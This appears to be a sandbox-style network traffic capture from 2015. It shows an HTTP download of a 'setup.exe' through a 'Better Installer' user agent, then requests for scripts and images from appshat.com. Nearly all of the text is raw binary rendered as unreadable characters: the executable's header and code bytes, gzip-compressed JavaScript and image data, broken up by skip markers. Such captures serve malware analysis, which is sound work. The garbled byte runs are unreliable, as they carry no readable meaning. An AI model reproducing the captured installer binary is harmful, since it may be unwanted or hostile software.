...l..:B\k..I.V#...B.............. !...z. 3).5.9..........y..{.u;U};.*
..?.g........ ..B.7XE.N(...#{...qLc...<.....r.J...9.........e....`.
2.........|.I}6...%....F....4....[9....... (.....C..G~...Y0gs-.a..3..j
..M..8. M ...78^c.x&W.20..."s..zL....w..hKI..)p.....{..G.c..h..7... W.
..:.:zcJx.k;.i.}.........vE:..\...7.5...........28.w....F"....f..s..M.
[email protected]..{..U$.&.XQ.........t...Y.3......08$.F.....u0C......
.Z.9.4ZPb.XB}.IPKm..y{j..=S..Ly.<[.VW.7^S.R l.....$Y3-.=b...*c&..8.
C.IP.O..../....b.....&<p..=.\G..3.r..,.>GIo.....7.q`bie.L...S1._
..ZhG.J8E........U..Q.$...z.-!...FGh./Q[1...'..f...[H.Z...0.H...Qv...Q
[email protected]..#.3i...p.....GH.....$........xr..'Zs... Ni.M..e....Gg_g\.....H
P.y.-..a....R?N.7'.z....W$....7..5O.....H..`.Y....g.._cCzz..wS.s......
..Oa...p.k...h1.........g.C...X]/.*.fG...<.%......j".F.M....p..w..-
."#.(..)...6.y.=h......P..J.,|.p....(.9y...|[email protected],.*...
....N..W/.Y..H.ED.....UT.<...K."._1......\j......)r.....\.s.......v
.v..m..i.n<.l.s..7^<!....,..)..\.?..... .r...IW.0..HQ4?....K;Di.
|...2.....[h.#]...*.......M.&.....C.;..u....N..Y.SV.....0.(...1KBA70..
T...FyP....L.UiO?.,H^.c....E1....a.Z....v$.75.(..(..F...............,w
lB[.~...S.?{<./5.i..;.....T.W..F....|5u.%{.I#7r..Y)F..L.wW.....DQ.X
0X..........,..v.....]..[j......S.5..."...V"^..9......&.9..\........{.
.!0.Z.(Yqfx.....%..T...I^.M<...P.. ^..q. -s..(..m.........ss.......
.....o......)z...rR3.t..QG .T.A...AjK......9...Ca.Ej.L...BB.gK.a..2...
.....)T.............((..A.....&.H5........y> ..v..G......S...H.
<<< skipped >>>


GET /mag/ytaiesmt_smtyc_setup.exe HTTP/1.1
User-Agent: Better Installer(Mozilla)
Host: d2otsfra4otprh.cloudfront.net
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 1286329
Connection: keep-alive
Cache-Control: no-cache
Last-Modified: Mon, 23 Mar 2015 09:00:36 GMT
Accept-Ranges: bytes
ETag: "b8e31d44765d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:34:43 GMT
X-Cache: RefreshHit from cloudfront
Via: 1.1 d7876feb6aad13be77dcc3a0028488b5.cloudfront.net (CloudFront)
X-Amz-Cf-Id: cAJNRqEyF2RDwCJ47fXwbo4OSEj1Dxo9z6YboV-X9-Pgsk7rtzxOag==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
.................................................s....................
...................................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>


GET /css/style.css HTTP/1.1
Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3



..:9....5Xa.q{..I!........8.Z)..BQ.x..?6..{^.<Q...|[email protected].}
w...e..!..........(....3..P..6...M.t..t.Z8%....9.....5...o.H.....P....
...c..p..CTu..~..[..PP........... ....la..5 bv.@......|.......0....ont>..


GET /js/scripts.js HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:39 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Sun, 19 Apr 2015 00:06:39 GMT
Cache-Control: max-age=1800
Content-Encoding: gzip
1ff.............T.n.0... ...S.!%-b..zp..P.h..g..V....H.9....zDJ.....`.
..vvv..|....52.)..[.w._5.......JW...2.W.*..j.. X.....~} *.>?[]|....
Q..&s.[.....tA.7..D...n.Z!s.^....c|.8..l/..J..w..L).XU'.FLvV.0...w...(
.........s.........S_2....w.V{....|.|.3.".f"....X....v)Gq.g..kG..z6...
.B...E..G.B...........4.k=.h0...4..kJ;.. ........u@.(...M.{ 2:..sa....
...CBx.......:..>k.....T..d1..........'.d.......9.n."...c:quU.tP...
F.:.g.-Z...q{...z....W.Nw...O..4.....x.;y}K...$E.E...T...X..%.Y...-...
....)C=...x......>:....G.&.|......0......


GET /js/lightbox.js HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:39 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Expires: Sun, 19 Apr 2015 00:06:39 GMT
Cache-Control: max-age=1800
Content-Encoding: gzip
bde.............Zyo.......SUXJ..JR..:....t..q..X.A.P.H..".<|..w....
K...N`.3..y...h...4^o.ev....O...7.4........A....,w.........H..a...^g9.
f9gq...mP.Y:g.q...#...Z...7..."Q../F`$.i.#[email protected].....(.<^V
D..].`,....o..g..D..b..Y.h1:b..s.~YU..l.....y..A..4b...a.W.-...~......
,..e..YP...L.-...$N/.........~.AX..0:...E.....,.?ve.N ...$.....%....U.
.f.fJ./.m.q..(.o.mP..U.)..8...J2.*fb.q..b....M..4..xY. ."/.....|]-yz..
i..7>mF...fZ....';.[..p>.z..$(yQ....HP..Z..z....F..2.,[.0...e1z.
.1.x..#.H).v....e^.e..-N...xJX....$.......B].7.`M.E.oNd.8..]l. ='6....
.../9.&t"..'Y....z...V..MI.o..2..H.Gq...PK^..'...F..!{.R~.=.....v..f.j
.#.e..R.r:c..1v.c...*...>.a.....{........:V,aL.i.VtiI.....'....R.6o
..y-H......{*.:@'IV..rAB..w......a..r.j.....u.A.N?iL'..'..X<.k.b...
...JM.....yY.iS.B.....&.....#.gh.b.C=.X..e...O.k.a..0,..7p..Xr......L.
.%bjcZ.|a.........%3.J..h.h.".[4..T..9$$.n".._.......:...[f..7...^..z.
...|.....6..pt...A,4..s.rg../<.t2.k..<..5/gJb........[-......ow.
.. MP.5$0..........z..3O..].<.n<..v.. ....#..sH...... 8.Q..8L...
...QV..q..B....s7t.]7..1 ........`....V......&...H.ui. ..`..e.$....4..
P..yx,=..1-.n.h..A.#|......^*.....[..t......M.:..V..{R..$"..).?gB.m.lc
n..g.....3.|.c......Nf.o.YN..x..%.2.."_q2!..gy. .......p...}...^.y3...
.Q...p?.aN....=..a.....m.kR(N.=U#....=..Q;r........Y..y..X.!...;..m..!
..7.....6.....%...j.]!.....)V..~.. _.sTo.9..p.._r....d*!...2.F.!.$<
.4....OP..Y...~.8.....(.6....2N......=".......|.U....o........#.[..i.J
.........&....S(.M.......$o.ia.$}.C.}v8..s...U....Ca.^....l...7.. 
<<< skipped >>>

GET /thumbnails/banner/images/assets/1/3/13a052a6d8c62b7831aa10e2f6f37454.jpg HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:39 GMT
Content-Type: image/jpeg
Content-Length: 14828
Last-Modified: Sun, 28 Jul 2013 10:29:05 GMT
Connection: keep-alive
ETag: "51f4f271-39ec"
Expires: Sun, 19 Apr 2015 00:06:39 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
......JFIF............................................................
......................................................................
..................../.u..".........................................._.
..........................!..1A."Qa..#2q...B....$3RSTUbrs....&456ctu..
.......Þ...Cde.....................................4................
......!..1AQa.."q....#B..23R...br.............?...)J.)J.)J.)J.)J.)J.)J
.)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)J.)T..iJP)JP)J
P)J.j......AZR..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R..R.M...
u.:..~....[).....R.2C.H..%e..b...Eq...3.l......v......Y.[.W.&e....~X).
5...-.........Q.W;.;..L.....g.c3.n..Ls[. ....'f..iq...[Ga.>.-1m..=a
.:..{p7.....j.u..[w;...L........Q.|.......a.u..'.v].........1]m..7Ab.P
>qU.......@<.........Rut.]..7...Y..h.....2...........O...Ht.I...
.2E>6.}..Vr.4\DJ.....0(..2.vq..r.4t.3..3X....4\6.....:..s"...`.,..p
T..fVD..Y.$...u....x.......'.v.A.K.......%s.=k).5..Z...ty.K....z=...f.
.m.h.X............wr..j....xv[...%..&...;c",.....h.....H...}R.*..(A ..
{..u.V..-:..viG9....1..LRM....pL...U...3..M..R#W..N>..... ..-j....k
..<v......ed.)Ni..,..<6.Y..a.a..ot.p.E.........n..dl..bg.H.....1
...T.._*.:'...|.t...7s.)R.)JP)J.....=...U........r<v:.>.........
..~]...=../....M..P?....9.qqn...p.]..-.2.0.i.M..e..e/2..KF.m`U.$GS..7V
GR:2..`.4._.........sj...n!.i#1I.I.x.".<n..T.e|.poR^.;..Z...9m.r...
c%.V.........X.s.#.6.|Y..2.5.,bw......3m9..Y...m`..cF..ZhcxT.0.1...t-~
..c..h..U........*.J.>.Z...9...F.v..p%...b..8.....G.......5....
<<< skipped >>>

GET /thumbnails/banner/images/assets/3/6/365640f122ef96f033f2f87c6308031e.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:39 GMT
Content-Type: image/png
Content-Length: 126333
Last-Modified: Thu, 13 Jun 2013 17:56:48 GMT
Connection: keep-alive
ETag: "51ba07e0-1ed7d"
Expires: Sun, 19 Apr 2015 00:06:39 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR.............X.h.....sBIT.....O.....bKGD............ .
IDATx...i..I.%........Q..-...W.?dVvdf..:..<......x..yd..FU..nf.P...
Pu.~...T..TDLE.T.D.D.LDT.LDMD...T.L... ."...R.Q......?e.......5..1P..,
....*.....".M..6...>......ju...Z<.e.z|( ..".s...jb....j.7.$1...i
...V.p_..Y0L..fp..u..Xh..^|i.U....}E...m.N`.....Z......f.Q...m_...UA..
....^S...}sy..N..Q.V&Z....*f]._.?....0.....yB".....D.x...P!W.c%.......
../<,T.Z.2."c...rP. nW1K..g...>.........R...0....r..I.q<....C
....`Ej.N.....".b.uj..0..(..T..J.S.r.eJ...7}......S......x ...r..6...u
J."[email protected]...[G...>I.0.K&H...6b.35UU..Z(...2Z[..F...;.6..
..........4;.B.wb}.<...g."..;[H......uk..jR.. 2.?n.Z .;... .5...x.*
...R...f...glR.U.wb...|j8.#..`..q..-AC).WyI.p....$b..:..h...X..7...B..
.....>V .i>..OS..B...!.....&IJ...*..0 $j$..H...B..a....D........
.;e0C.Fjt.d.D.....j.j..G.....j.ldU'Z".:$.X..t..GA....0b.>rGxx.L.e.p
-{v<....s. .X.r.[Vug.X...............w.)5}..MX<...Ur....I.-*....
.gx..I..b...3X.#K8..|..H..D5.i.#..& .5....... ...GjVU...........%..d.Y
...15]A$...j....fSi...]...C.R..a..y4.[.>[email protected]...
..2..........%.....1y.,..n.7v9U.r.....\.h.s#.Z.J2.i.#[email protected]
Fj=..QhZac..<.e.....d.M&*.Y......2......@B...%[email protected]:.~oY
*.`x.Z,...{.*..M.Q}...B!N.."!.c.......Q{$s.H.$.....S5qU3!..O....<..
\F.:..$-X.O.);...e.."-...^.g<.U.=Y.\N...qB[...?..m<J.T...y.j..4.
p.8......O9.._.....`t...#."...I..:..H..%......h.......g>eW....-....
...r..V.xvF"-....P...d.L.Y....&r....'b.....w..|HS"n.8.v.^V.v..B.B#
<<< skipped >>>

GET /images/4.5stars.jpg HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:40 GMT
Content-Type: image/jpeg
Content-Length: 2275
Last-Modified: Wed, 21 Aug 2013 16:47:03 GMT
Connection: keep-alive
ETag: "5214ef07-8e3"
Expires: Sun, 19 Apr 2015 00:06:40 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
......Exif..II*.................Ducky.......P..... hXXp://ns.adobe.com
/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> 
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c01
1 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="h
ttp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rd
f:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="
hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.a
dobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:C50CBA34D0FE11E2A837F7F58
4958E09" xmpMM:InstanceID="xmp.iid:C50CBA33D0FE11E2A837F7F584958E09" x
mp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFr
om stRef:instanceID="xmp.iid:D2ECCA94C82C11E2B97E98D68EE09333" stRef:d
ocumentID="xmp.did:D2ECCA95C82C11E2B97E98D68EE09333"/> </rdf:Des
cription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?
>....Adobe.d.......................................................
......................................................................
......................9...............................................
.....................................!.......1"a2B34AQ.bc.............
........!..1A....a2...Qq."BR%.b#...3.$............?...3...y{....oT..w.
..W<.>V....*....e..,..X}P....O..d...<.......5MuV6.w.3....o/q$
Tb."*.[.K..J...h.....]..........\v.-I..f.$~...H.........Z.....U33\.7.J
.N.GA<-..-.....RK...L..}..........i..[.V.m.k.v.T..ze.b[.u..2...6"..
..).q....?.:.n#t&..g..`.."*.D.;.. ..1'..2...L.*....eTIW.LOtaAO.`&l
<<< skipped >>>

GET /thumbnails/icon/images/assets/0/7/07fce0a4ff78cc7e6376e227f046ce06.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:40 GMT
Content-Type: image/png
Content-Length: 514647
Last-Modified: Thu, 13 Jun 2013 17:01:53 GMT
Connection: keep-alive
ETag: "51b9fb01-7da57"
Expires: Sun, 19 Apr 2015 00:06:40 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR..............x......pHYs................OiCCPPhotosho
p ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE.........
..Q,......!.........{.k........>...........H3Q5...B..........@..$p.
...d!s.#...~<< ".....x.....M..0.....B.\[email protected]..@F....
&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH..
...........0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I.
 [email protected]..._-...."[email protected]~..,/...;.
.m..%..h^[email protected].~<<E.........J.B[a.W}.g._.W.l.~<..
....$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..&
gt;.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?..
..D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/[email protected]..=p..
a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2...
.G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.
."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.X
H,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,  .......3...!.[.
[email protected].(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.
....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&
..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._.
.. .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).).
.4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.
n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC][email protected]....
..<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<< skipped >>>

GET /thumbnails/icon/images/assets/6/a/6a12dc1a298e870b610a58a56ba0f5ec.jpg HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:40 GMT
Content-Type: image/jpeg
Content-Length: 18198
Last-Modified: Thu, 13 Jun 2013 17:15:43 GMT
Connection: keep-alive
ETag: "51b9fe3f-4716"
Expires: Sun, 19 Apr 2015 00:06:40 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
......JFIF.............C................................... $.' ",#..(
7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222
222222222222222222222...........".....................................
.......................}........!1A..Qa."q.2....#B...R..$3br........%&
'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz...........................
......................................................................
.............................w.......!1..AQ.aq."2...B.....#3R..br...$4
.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................
................................................................?....(
...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
.(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
.(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
.(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
.(...(...(...(...(...(...(...(...(...(...(.......q.....B...Z......X.D.
.TT.,[GF...^4.....WV....../..W.Hr.[.`.;....SKD.O1.....h..Q... MQ.U.m S
.....8: ...6.t1..........'..`T:f.-.1N.F.2N..;Y{....n..^c......V....c..
..4.y...X...H..q......m4.B.M..R.Da~eld..Z..b..\rJ.ms/......p.W.%...u.;
...R.p....!..l..T.mv:....~~..O9.......b9...c.).....v..c9..............
....G.E..<....c.)|..X....?.............<...o*<.....Z.~.k.
<<< skipped >>>

GET /thumbnails/icon/images/assets/e/5/e54e8c720dffffa619c3b0eacec9381a.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:40 GMT
Content-Type: image/png
Content-Length: 53266
Last-Modified: Thu, 13 Jun 2013 17:53:06 GMT
Connection: keep-alive
ETag: "51ba0702-d012"
Expires: Sun, 19 Apr 2015 00:06:40 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR..............x......sBIT....|.d.....pHYs...........~.
....tEXtSoftware.Adobe Fireworks CS5q..6....tEXtCreation Time.3/8/12bk
.... .IDATx...y.\.u/.jw.9G....c. C...;.  .&..2z..H.\..$..y....../..O|.
..I.5J.3v0F.....{.D0...f.1...61H.q.....{....=..VU..N.....].j....k..k.)
%0....../D.V..`0..F......`0.c.v.......C...`0..........`0....0....1.`..
.`0..1.;.....`.!..`0...c......`0.c.v.......C...`0..........`0....0....
1.`...`0..1.;.....`.!..`0...c......`0.c.v.......C...`0..........`0....
0....1.`...`0..1.;.....`.!..`0...c......`0.c.v.......C...`0..........`
0....0....1.`...`0..1.;.....`.!..`0...c......`0.c.v.......C...`0......
..B.S..C...g...?..g.....G..5\..B .,.....m.Jb[....- N.....a0..R}.r..1..
.w...g..".....S.....T.NF&n.f.%D.................0... .......T...'.w.).
i .e.R._a......g<eT..c9..x...(............%*.`xA.R.<...$jW......
.ih&.vaan../.LV..[...>.......M.X'.z...,.8b..e.W......8...J..`..S..Q
.......J..Ie..}z...G........D..t?..h.T....L..0..k...:p..1t.]y.....t...
...x.......y|y..../........%X9N.}.b2r..8..o..f0.....(a...H..j.R={.....
.K.....O9...W...a..16u..G..h.5.......#R...0....0... .:_.8^.......<t
x.go~.v...a7..5.9c-......R.J.B.>..b..:g./..8~....K..`..S...A.......
Ag.?......LW..g7..T"5..CxM....~.^ ..&....~cF...{[email protected]
$.N.....Qi].3q.f.s...q..H..N...Mcl.......~.....9.......S..fZ....!.....
0... .:A.x.H.....w7......'[email protected]
OF.....`.5...".j.r..........w-.S2*.0G....Q.i..R.2.._........P..=..."..
d....`..S_<...p.....\.5?...g.w....3.y.E~^)..q&.`..h.M>..~..B
<<< skipped >>>

GET /thumbnails/icon/images/assets/8/3/83a4cee7a59522b93ed0ae1fa73ce8f3.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:40 GMT
Content-Type: image/png
Content-Length: 48422
Last-Modified: Thu, 13 Jun 2013 18:07:09 GMT
Connection: keep-alive
ETag: "51ba0a4d-bd26"
Expires: Sun, 19 Apr 2015 00:06:40 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR..............x......pHYs................MiCCPPhotosho
p ICC profile..x..SwX...>..e.VB....l.."#[email protected]..
..H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.
. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....
ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v
.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."
...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[
..V.h..][email protected].<......%b..0..>[email protected].@...
...qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N.
...l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A......
........a.D@.$.<.B........A.T.:.............18....\..p..`........A.
..a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u
@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v..
..a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._
.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R..
.J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.
......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~.~V.y.s..
....K.X.........y..r....:.#....y=......}.........([email protected].>.|.
./....%..3... cHRM..z%..............u0...`..:....o._.F...SIDATx...w...
.......;..B.J...6QH.....5`c..6..`Lr.........}[email protected][email protected].....
........ .V;.3........l......y..=l.....q....4f>...../....RJtuu...|.
W]sM.5..{...[.....9{...N.D.(a.....Y(4Q....8/_.)a.%!.< %X(.mX7.V
<<< skipped >>>

GET /thumbnails/icon/images/assets/5/8/589b1e936e1f038dc45bd8ffff59b359.png HTTP/1.1


Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.appshat.com
Connection: Keep-Alive
Cookie: symfony=kr6rsneb04oodna0h6pcc568o3


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:40 GMT
Content-Type: image/png
Content-Length: 275725
Last-Modified: Thu, 13 Jun 2013 18:08:34 GMT
Connection: keep-alive
ETag: "51ba0aa2-4350d"
Expires: Sun, 19 Apr 2015 00:06:40 GMT
Cache-Control: max-age=1800
Accept-Ranges: bytes
.PNG........IHDR..............x......tEXtSoftware.Adobe ImageReadyq.e&
lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:3212C012122068118A6DE6ECBB0B76D8" xmpMM:DocumentID="xmp.did:1AA1
385C0AE811E286AAD4663D41448D" xmpMM:InstanceID="xmp.iid:1AA1385B0AE811
E286AAD4663D41448D" xmp:CreatorTool="Adobe Photoshop CS5.1 Macintosh"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FB41A5FD2B2068118D
BB8B5619EC708E" stRef:documentID="xmp.did:3212C012122068118A6DE6ECBB0B
76D8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>9..U..1;IDATx...{...U....w>............i
L.......B.@".JK....U...)...ZEj...UT..I..F..ID......B....s`<.o.....|
...z.s....Y...........~..^k].Z...p.....;..}{:t.....3..uk.......92....5
...Mw....{...i{{{~..^?.;vl>V.W....g.{}...q.=...W....W..............
